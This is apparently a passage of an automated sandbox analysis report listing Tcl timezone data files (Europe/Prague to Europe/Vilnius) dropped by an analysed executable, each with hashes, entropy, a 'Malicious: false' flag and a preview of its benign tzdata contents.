SHA-512:	6CABAAD76ADCD33363E785262AE08C17218FF1A374236A99120AA0F5DF1386B0CC5B08A8BD85E01553E2E543B7647282FEC82F69281C8B1D582F08152DE28506
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Prague) {. {-9223372036854775808 3464 0 LMT}. {-3786829064 3464 0 PMT}. {-2469401864 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-798073200 3600 0 CET}. {-780534000 7200 1 CEST}. {-761180400 3600 0 CET}. {-746578800 7200 1 CEST}. {-733359600 3600 0 CET}. {-716425200 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654217200 7200 1 CEST}. {-639010800 3600 0 CET}. {283993200 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {

C:\Users\user\Desktop\tcl\tzdata\Europe\Riga Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7400
Entropy (8bit):	3.6850163461359067
Encrypted:	false
SSDEEP:	96:hN6YyurGXl6V/jfaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:hGGG160h2kNU4tB715pyzHy1gA
MD5:	310D3FAAC268D48C554CC32C51322696
SHA1:	EA16F8A93AEB1CD34091C1088B16E79F2C8F39B3
SHA-256:	93A2AC0D470B8F7D1DD175C96DC1DEB0925205B6F0C849A7CCAF2F367B683010
SHA-512:	1DA9BFD749FBD4970CDEA6A04E2F382E95505D49AF2026776CA30C43AF72F26DC9E1972CFB86E03D6602896825207B0EA9F8AC012755AB28E777A4A777FB9635
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Riga) {. {-9223372036854775808 5784 0 LMT}. {-2840146584 5784 0 RMT}. {-1632008184 9384 1 LST}. {-1618702584 5784 0 RMT}. {-1601681784 9384 1 LST}. {-1597275384 5784 0 RMT}. {-1377308184 7200 0 EET}. {-928029600 10800 0 MSK}. {-899521200 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-795834000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598

C:\Users\user\Desktop\tcl\tzdata\Europe\Rome Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8481
Entropy (8bit):	3.7293906313259404
Encrypted:	false
SSDEEP:	96:YdTwwpNqX5nWycRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:YJ0J2RNH4Mn82rlo6XIZ9ALeBO
MD5:	51C2C963E24C9A4F3C7DB8317B161375
SHA1:	17474F78FDD15A2A56E9F695E2512929BFE6020B
SHA-256:	5A8734DA41676A811DA5B79F3C7888B72FDE08CDE5E5B8367405D137EA5F5BE2
SHA-512:	52BB9CDFD21748B8AEC93FC1D041D6AB06A2D9AEDF2E40832360A5B69C667068961BB6AF7D5B8D201786F2D083E637FF4663E3DE42DF300738B1BEF9E298834D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Rome) {. {-9223372036854775808 2996 0 LMT}. {-3259097396 2996 0 RMT}. {-2403564596 3600 0 CET}. {-1690851600 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1649034000 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616979600 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585530000 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555290000 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804819600 3600 0 CET}. {-798080400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71719200 3600 0 CET

C:\Users\user\Desktop\tcl\tzdata\Europe\Samara Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2155
Entropy (8bit):	3.957566972369467
Encrypted:	false
SSDEEP:	48:Ynh7bcmFnNXjT+UvqBnX0VZb+Jg1ndgwd:4hvlFnNTTNv8X0VZbag1ndJd
MD5:	05F9746650A7BC0357B2698887AE81AB
SHA1:	6979F86B640B49805346F5F07DD9EB1CCE2F7EE8
SHA-256:	D0239F4748ED04F7D1F4FA8E604721CA6B8BEA8A978F8EA39438AC804C5AB545
SHA-512:	2F17C4808D9C24974497F395D47BE467C11D47CC3370DB78E69A9CC4C66416E85A865647FE3411EBBB022840298A7D513FB17E97F1AD5896091E997B0B803C6F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Samara) {. {-9223372036854775808 12036 0 LMT}. {-1593825636 10800 0 SAMT}. {-1247540400 14400 0 SAMT}. {-1102305600 14400 0 KUYMMTT}. {354916800 18000 1 KUYST}. {370724400 14400 0 KUYT}. {386452800 18000 1 KUYST}. {402260400 14400 0 KUYT}. {417988800 18000 1 KUYST}. {433796400 14400 0 KUYT}. {449611200 18000 1 KUYST}. {465343200 14400 0 KUYT}. {481068000 18000 1 KUYST}. {496792800 14400 0 KUYT}. {512517600 18000 1 KUYST}. {528242400 14400 0 KUYT}. {543967200 18000 1 KUYST}. {559692000 14400 0 KUYT}. {575416800 18000 1 KUYST}. {591141600 14400 0 KUYT}. {606866400 10800 0 KUYMMTT}. {606870000 14400 1 KUYST}. {622594800 10800 0 KUYT}. {638319600 14400 1 KUYST}. {654649200 10800 0 KUYT}. {670374000 7200 0 KUYMMTT}. {670377600 10800 1 KUYST}. {686102400 10800 0 KUYT}. {687916800 14400 0 SAMT}. {701809200 18000 1 SAMST}. {717530400 14400

C:\Users\user\Desktop\tcl\tzdata\Europe\San_Marino Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	174
Entropy (8bit):	4.908962717024613
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQawELDX7x/yQax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyt/yR
MD5:	C50388AD7194924572FA470761DD09C7
SHA1:	EF0A2223B06BE12EFE55EE72BF2C941B7BFB2FFE
SHA-256:	7F89757BAE3C7AE59200DCEEEE5C38A7F74EBAA4AA949F54AFD5E9BB64B13123
SHA-512:	0CE5FF2F839CD64A2C9A5AE6BBE122C91342AE44BDECDB9A3BA9F08578BC0B474BC0AF0E773868B273423289254909A38902B225A0092D048AC44BCF883AB4B0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/San_Marino) $TZData(:Europe/Rome).

C:\Users\user\Desktop\tcl\tzdata\Europe\Sarajevo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.890934294125181
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawEX3GEaQahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqa
MD5:	5C12CEEDB17515260E2E143FB8F867F5
SHA1:	51B9CDF922BFBA52BF2618B63435EC510DEAE423
SHA-256:	7C45DFD5F016982F01589FD2D1BAF97898D5716951A4E08C3540A76E8D56CEB1
SHA-512:	7A6B7FDFD6E5CFEB2D1AC136922304B0A65362E19307E0F1E20DBF48BED95A262FAC9CBCDB015C3C744D57118A85BD47A57636A05144430BF6707404F8E53E8C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade).

C:\Users\user\Desktop\tcl\tzdata\Europe\Simferopol Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7265
Entropy (8bit):	3.686901511920866
Encrypted:	false
SSDEEP:	96:jjInyur/gUaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ9A:jj9G4h2kNU4tB715pyzHy1gA
MD5:	C812B3364C36CB38EC093B16D042C5D2
SHA1:	726A9EA1B30FAC44C255824E418D1C4DA2A87A96
SHA-256:	C77998FEF6F9E99CEF3396D5DB9706364D41CF9B486B00A3A1DFC78F977D5390
SHA-512:	C3EE2CF7CD66D261CC9A2F5FC41A2F27221E3412A0FC01C784AA8FA8FB019F1BAD2027311773C6F2AFD4C699BEA522DF1882930F28302B12173D7A82B6D90ABA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Simferopol) {. {-9223372036854775808 8184 0 LMT}. {-2840148984 8160 0 SMT}. {-1441160160 7200 0 EET}. {-1247536800 10800 0 MSK}. {-888894000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-811645200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 7200 0 EET}. {694216800 7200 0 EET}. {701820000 10800 1 EEST}. {71754

C:\Users\user\Desktop\tcl\tzdata\Europe\Skopje Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.906520812033373
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawOgpr8QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq3
MD5:	BB062D4D5D6EA9BA172AC0555227A09C
SHA1:	75CCA7F75CEB77BE5AFB02943917DB048051F396
SHA-256:	51820E2C5938CEF89A6ED2114020BD32226EF92102645526352E1CB7995B7D0A
SHA-512:	8C6AD79DD225C566D2D93606575A1BF8DECF091EDFEED1F10CB41C5464A6A9F1C15BEB4957D76BD1E03F5AE430319480A3FDACEF3116EA2AF0464427468BC855
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade).

C:\Users\user\Desktop\tcl\tzdata\Europe\Sofia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7425
Entropy (8bit):	3.636600707094948
Encrypted:	false
SSDEEP:	96:8lAV/6vcB0YixX21/BVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykePG:8lAV/tEm1/mh2kNU4tB715pyzHy1gA
MD5:	CFEFD8E083A3AC248798B514863B2859
SHA1:	B6B0BA60BB1AA91B65A76B7407D89C1C66E0A48A
SHA-256:	A5C1637C550B1F439F48B645C9EEB3B742A55EFAEB32B96838E45B8B9063EDC0
SHA-512:	B03A3D46AE78D7A4C4A03DE1A7DBE708CB2A5858787D30C134C8E9943D2E00C1B202DE1FDBB42E32A01FF4E2DFBDF98ABCF2C2ED870AB492EE76E9D5BE2BD13B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Sofia) {. {-9223372036854775808 5596 0 LMT}. {-2840146396 7016 0 IMT}. {-2369527016 7200 0 EET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-781048800 7200 0 EET}. {291762000 10800 0 EEST}. {307576800 7200 0 EET}. {323816400 10800 1 EEST}. {339026400 7200 0 EET}. {355266000 10800 1 EEST}. {370393200 7200 0 EET}. {386715600 10800 1 EEST}. {401842800 10800 0 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200 10800 1 EEST}. {496800000 7200 0 EET}. {512524800 10800 1 EEST}. {528249600 7200 0 EET}. {543974400 10800 1 EEST}. {559699200 7200 0 EET}. {575424000 10800 1 EEST}. {591148800 7200 0 EET}. {606873600 10800 1 EEST}. {622598400

C:\Users\user\Desktop\tcl\tzdata\Europe\Stockholm Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7058
Entropy (8bit):	3.730067397634837
Encrypted:	false
SSDEEP:	96:K39ucRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:K3HRNH4Mn82rlo6XIZ9ALeBO
MD5:	7F6C45358FC5E91125ACBDD46BBD93FE
SHA1:	C07A80D3C136679751D64866B725CC390D73B750
SHA-256:	119E9F7B1284462EB8E920E7216D1C219B09A73B323796BBF843346ECD71309A
SHA-512:	585AE0B1DE1F5D31E45972169C831D837C19D05E21F65FAD3CB84BEF8270C31BF2F635FB803CB70C569FAC2C8AA6ABDE057943F4B51BF1D73B72695FE95ECFD2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Stockholm) {. {-9223372036854775808 4332 0 LMT}. {-2871681132 3614 0 SET}. {-2208992414 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST

C:\Users\user\Desktop\tcl\tzdata\Europe\Tallinn Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7322
Entropy (8bit):	3.676305759985654
Encrypted:	false
SSDEEP:	96:dcqDyurGXl6V/D1aKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:e7GG16+h2kNU4tB715pyzHy1gA
MD5:	1B0408D8BBA72BA7ADB24A76736F2DF4
SHA1:	2560D00A090E1198286400A3E2692978A97BCC06
SHA-256:	C40A6469CFAEA8AE23248A5DDDF2E084A3E97082BD333AEAA18B5B8A2ACE6F5F
SHA-512:	50005B4D3BAB98D553E98E0DFA9534245853C3A212FB9C0A9364B182803DD4245A2A36D61B58BECCAE30B27387811A1A46B96EAF4DF633F6C08214D148FFE483
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tallinn) {. {-9223372036854775808 5940 0 LMT}. {-2840146740 5940 0 TMT}. {-1638322740 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1593824400 5940 0 TMT}. {-1535938740 7200 0 EET}. {-927943200 10800 0 MSK}. {-892954800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-797648400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598400 7200 0 EET}. {638

C:\Users\user\Desktop\tcl\tzdata\Europe\Tirane Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7412
Entropy (8bit):	3.7216700074911437
Encrypted:	false
SSDEEP:	96:6t1WXXRM8DAdRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:6GXh9AdRNH4Mn82rlo6XIZ9ALeBO
MD5:	872AB00046280F53657A47D41FBA5EFE
SHA1:	311BF2342808BD9DC8AB2C2856A1F91F50CFB740
SHA-256:	D02C2CD894AE4D3C2619A4249088A566B02517FA3BF65DEFAF4280C407E5B5B3
SHA-512:	2FF901990FA8D6713D875F90FE611E54B35A2216C380E88D408C4FB5BD06916EE804DC6331C117C3AC643731BEADB5BDEDEA0F963B89FAEDB07CA3FFD0B3A535
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tirane) {. {-9223372036854775808 4760 0 LMT}. {-1767230360 3600 0 CET}. {-932346000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-843519600 3600 0 CET}. {136854000 7200 1 CEST}. {149896800 3600 0 CET}. {168130800 7200 1 CEST}. {181432800 3600 0 CET}. {199839600 7200 1 CEST}. {213141600 3600 0 CET}. {231894000 7200 1 CEST}. {244591200 3600 0 CET}. {263257200 7200 1 CEST}. {276040800 3600 0 CET}. {294706800 7200 1 CEST}. {307490400 3600 0 CET}. {326156400 7200 1 CEST}. {339458400 3600 0 CET}. {357087600 7200 1 CEST}. {370389600 3600 0 CET}. {389142000 7200 1 CEST}. {402444000 3600 0 CET}. {419468400 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {457480800 7200 0 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}.

C:\Users\user\Desktop\tcl\tzdata\Europe\Tiraspol Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.85845283098493
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV+NM/LpVAIgoq9NM/eO6yQa3MPgJM1p8QagNM/cn:SlSWB9IZaM3ymI6NVAIgoI6eFytM4M8g
MD5:	743453106E8CD7AE48A2F575255AF700
SHA1:	7CD6F6DCA61792B4B2CBF6645967B9349ECEACBE
SHA-256:	C28078D4B42223871B7E1EB42EEB4E70EA0FED638288E9FDA5BB5F954D403AFB
SHA-512:	458072C7660BEAFEB9AE5A2D3AEA6DA582574D80193C89F08A57B17033126E28A175F5B6E2990034660CAE3BC1E837F8312BC4AA365F426BD54588D0C5A12EB8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Chisinau)]} {. LoadTimeZoneFile Europe/Chisinau.}.set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau).

C:\Users\user\Desktop\tcl\tzdata\Europe\Uzhgorod Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7287
Entropy (8bit):	3.681086026612126
Encrypted:	false
SSDEEP:	96:DptgbYyurZiVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:Dp4GZNh2kNU4tB715pyzHy1gA
MD5:	E1088083B0D5570AF8FBE54A4C553AFB
SHA1:	A6EC8636A0092737829B873C4879E9D4C1B0A288
SHA-256:	19D87DB3DAB942037935FEC0A9A5E5FE24AFEB1E5F0F1922AF2AF2C2E186621D
SHA-512:	C58AA37111AE29F85C9C3F1E52DB3C9B2E2DCEFBBB9ACA4C61AD9B00AA7F3A436E754D2285774E882614B16D5DB497ED370A06EE1AFC513579E1E5F1475CA160
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Uzhgorod) {. {-9223372036854775808 5352 0 LMT}. {-2500939752 3600 0 CET}. {-946774800 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 1 CEST}. {-794714400 3600 0 CET}. {-773456400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 3600 0 CET}. {670384800 7200 0 EET}. {694216800

C:\Users\user\Desktop\tcl\tzdata\Europe\Vaduz Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6911
Entropy (8bit):	3.723944005853111
Encrypted:	false
SSDEEP:	96:KLmcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:K9RNH4Mn82rlo6XIZ9ALeBO
MD5:	A7E09F7B3A057B1D70FC6B016BF03D4B
SHA1:	ACB8A4116FB8BC67556B6F7CADD06EF4705AF0C2
SHA-256:	2234E538FB233FFC376AD68D3CFA5288F2663B303EBA26F1826442E7C3195BD9
SHA-512:	16D611143F5FE97092E07923793F45C8EB29C0D2E036B8646CE0FD31EC89C5B5C28DFCF5FF0A784BABFFD8151FD44FD1E346C8B9B62E938F6A68384F265E2256
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vaduz) {. {-9223372036854775808 2284 0 LMT}. {-2385247084 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}. {749005200 3600 0 CET}. {764730000 7200 1 CEST}. {780454800 3600 0 CET}. {796179600 7200 1 CEST}. {811904400 3600 0 CET}. {828

C:\Users\user\Desktop\tcl\tzdata\Europe\Vatican Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.8663121336740405
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQa1xLM1p8Qax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyvN+a
MD5:	0652C9CF19CCF5C8210330B22F200D47
SHA1:	052121E14825CDF98422CAA2CDD20184F184A446
SHA-256:	3BC0656B5B52E3C3C6B7BC5A53F9228AAFA3EB867982CFD9332B7988687D310B
SHA-512:	1880524DCA926F4BFD1972E53D5FE616DE18E4A29E9796ABEAEE4D7CD10C6FE79C0D731B305BD4DAA6FC3917B286543D622F2291B76DABA231B9B22A784C7475
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/Vatican) $TZData(:Europe/Rome).

C:\Users\user\Desktop\tcl\tzdata\Europe\Vienna Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7659
Entropy (8bit):	3.7322931990772257
Encrypted:	false
SSDEEP:	96:2ntWj6DmcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:2tWURNH4Mn82rlo6XIZ9ALeBO
MD5:	E8D0D78179D1E9D738CEEC1D0D4943E5
SHA1:	E0469B86F545FFFA81CE9694C96FE30F33F745DD
SHA-256:	44FF42A100EA0EB448C3C00C375F1A53614B0B5D468ADF46F2E5EAFF44F7A64C
SHA-512:	FACA076F44A64211400910E4A7CAD475DD24745ECCE2FE608DD47B0D5BB9221FF15B9D58A767A90FF8D25E0545C3E50B3E464FF80B1D23E934489420640F5C8A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vienna) {. {-9223372036854775808 3921 0 LMT}. {-2422055121 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1577926800 3600 0 CET}. {-1569711600 7200 1 CEST}. {-1555801200 3600 0 CET}. {-938905200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-780188400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {323823600 7200 1 CEST}. {338940000 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}.

C:\Users\user\Desktop\tcl\tzdata\Europe\Vilnius Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7203
Entropy (8bit):	3.687252441677403
Encrypted:	false
SSDEEP:	96:/FsyurprhV/DAOLl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEA:/fGthOh2kNU4tB715pyzHy1gA
MD5:	AD8BCF9986455BE7736DF6329408A3F7
SHA1:	D4464B96568015C908FB84DE9500B7CCB8E31C7E
SHA-256:	C3224B2C8358D95E00C8676DB57CC39216E2C85FA503DDEB6BD7E5E42D40403D
SHA-512:	EC02DF9F51B08DAB1D8BD6768CCF5818C4E0D9C9B65D18BE4F04ED22CC393B3FF5AB39719FE47CFA0AB3992516F9C6BC3ABCB1897284CE85DB063646AAC540EB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vilnius) {. {-9223372036854775808 6076 0 LMT}. {-2840146876 5040 0 WMT}. {-1672536240 5736 0 KMT}. {-1585100136 3600 0 CET}. {-1561251600 7200 0 EET}. {-1553565600 3600 0 CET}. {-928198800 10800 0 MSK}. {-900126000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-802141200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 